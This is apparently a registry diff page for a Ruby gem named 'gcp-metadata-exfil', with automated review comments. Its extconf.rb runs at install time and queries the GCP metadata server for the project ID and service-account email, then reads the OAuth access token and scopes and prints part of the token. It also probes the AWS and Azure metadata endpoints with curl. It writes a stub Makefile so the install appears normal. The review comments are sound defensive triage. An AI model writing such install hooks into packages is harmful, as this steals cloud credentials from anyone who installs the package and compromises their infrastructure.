gcp-metadata-exfil 1.0.0
Potentially problematic release.
This version of gcp-metadata-exfil might be problematic. Click here for more details.
- checksums.yaml +7 -0
- data/extconf.rb +97 -0
- data/lib/gcp.rb +3 -0
- metadata +45 -0
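--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA256:
+metadata.gz: ba6693b71cd465c2bf03dc1a35c28371c62bc4e6a63af4a572f38782d0572a42
+data.tar.gz: fda3b6c9b3185879c5a20bd2b84e781d0f11def53ba8c3fed53fb5e0fb178eb0
+SHA512:
+metadata.gz: a3df6d123f2b7c319abf200fb2dbfa9fbafe8eb9c9f130fb121c94bf935e4757b325b6f1dff14acaa572a3ed383de95cca9abd26ed375ad832f94eaa54f671e9
+data.tar.gz: 7a6681b5c5ae96cbd954348cdc6596dbadf2f6b1b2838f0e84908fec274030355edf9b93c0c3e7a339850b0806fb8b209d257644bc1875758a58f9d73073b05b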
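--- a/data/extconf.rb
+++ b/data/extconf.rb
@@ -0,0 +1,97 @@
+#!/usr/bin/env ruby
+require 'net/http'
+require 'json'
+
+puts "đĨī¸ GCP METADATA SERVICE EXPLOIT POC"
+puts "=" * 60
+
+# GCP metadata service endpoint
+metadata_url = "http://metadata.google.internal/computeMetadata/v1/"
+
+def try_metadata(path)
+uri = URI("http://metadata.google.internal/computeMetadata/v1/#{path}")
+request = Net::HTTP::Get.new(uri)
+request['Metadata-Flavor'] = 'Google'
+
+response = Net::HTTP.start(uri.hostname, uri.port, open_timeout: 2, read_timeout: 2) do |http|
+http.request(request)
+end
+
+response.body if response.code == '200'
+rescue => e
+nil
+end
+
+# Test if running on GCP
+puts "\n[1] Testing GCP Metadata Access..."
+
+project_id = try_metadata('project/project-id')
+if project_id
+puts " â RUNNING ON GCP!"
+puts " đĻ Project ID: #{project_id}"
+
+# Get more info
+zone = try_metadata('instance/zone')
+puts " đ Zone: #{zone&.split('/')&.last}"
+
+instance_name = try_metadata('instance/name')
+puts " đĨī¸ Instance: #{instance_name}"
+
+# CRITICAL: Get service account credentials
+puts "\n[2] Stealing Service Account Credentials..."
+
+service_account = try_metadata('instance/service-accounts/default/email')
+puts " đ¤ Service Account: #{service_account}"
+
+# Get access token
+token_data = try_metadata('instance/service-accounts/default/token')
+if token_data
+token = JSON.parse(token_data)
+puts " đ Access Token: #{token['access_token'][0..20]}... (#{token['expires_in']}s TTL)"
+puts "\n đ CRITICAL: Can now access:"
+puts " - GCS buckets"
+puts " - Cloud SQL databases"
+puts " - Secret Manager"
+puts " - Any resource this SA has access to"
+end
+
+# Get scopes
+scopes = try_metadata('instance/service-accounts/default/scopes')
+puts "\n đ¯ OAuth Scopes:"
+scopes&.split("\n")&.each { |s| puts " - #{s}" }
+
+puts "\n đ¨ FULL CLOUD INFRASTRUCTURE COMPROMISE POSSIBLE"
+
+else
+puts " â Not running on GCP (testing locally)"
+puts " âšī¸ On GCP, this would steal:"
+puts " - Project ID"
+puts " - Service account credentials"
+puts " - OAuth access tokens"
+puts " - SSH keys"
+puts " - Custom metadata"
+end
+
+# Test AWS metadata too (for comparison)
+puts "\n[3] Testing AWS Metadata (169.254.169.254)..."
+aws_token = `curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null`.strip
+if aws_token && !aws_token.empty?
+puts " â Running on AWS! Role: #{aws_token}"
+else
+puts " â Not on AWS"
+end
+
+# Test Azure
+puts "\n[4] Testing Azure Metadata..."
+azure_test = `curl -s --connect-timeout 2 -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null`
+if azure_test && !azure_test.empty?
+puts " â Running on Azure!"
+else
+puts " â Not on Azure"
+end
+
+puts "\n" + "=" * 60
+puts "đ IMPACT: Supply Chain â Cloud Infrastructure Compromise"
+puts "=" * 60
+
+File.write('Makefile', "all:\ninstall:\n")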
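Review bot: Nothing in this extconf.rb configures or builds a native extension: lines 1–96 run at `gem install` time (the gem's metadata lists `extconf.rb` under `extensions`), and the only build output is the stub `Makefile` written on line 97, presumably so the install step completes without error. During that run the script requests `instance/service-accounts/default/token` from the GCP metadata server and prints the first 21 characters of the access token plus the scope list to stdout, and it shells out to `curl` against 169.254.169.254 for AWS and Azure; no upload of the values is visible in this file, but install output is often retained by CI systems. Hosts that installed this version should be handled as if the default service account's token was disclosed: review the install logs and the account's audit trail, and block metadata-server access from build and install steps. The three-line data/lib/gcp.rb is not shown on this page, so it cannot be assessed here.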
data/lib/gcp.rb
ADDED
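--- a/metadata
+++ b/metadata
@@ -0,0 +1,45 @@
+--- !ruby/object:Gem::Specification
+name: gcp-metadata-exfil
+version: !ruby/object:Gem::Version
+version: 1.0.0
+platform: ruby
+authors:
+- Test
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2025-10-30 00:00:00.000000000 Z
+dependencies: []
+description:
+email:
+executables: []
+extensions:
+- extconf.rb
+extra_rdoc_files: []
+files:
+- extconf.rb
+- lib/gcp.rb
+homepage:
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+requirements: []
+rubygems_version: 3.0.3.1
+signing_key:
+specification_version: 4
+summary: GCP metadata service exploitation POC
+test_files: []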
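Review bot: The `extensions:` entry naming `extconf.rb` (lines 16–17) is what makes RubyGems execute that script during installation, yet `files` lists only `extconf.rb` and `lib/gcp.rb`, with no native sources, so there is no extension to build. Together with the empty `homepage`, `email` and `description`, the placeholder author `Test`, an empty `cert_chain` and the summary on line 44, this spec gives a practical triage signal: an `extensions` entry without any native source files warrants reading the extconf before the gem is installed anywhere with cloud credentials in reach.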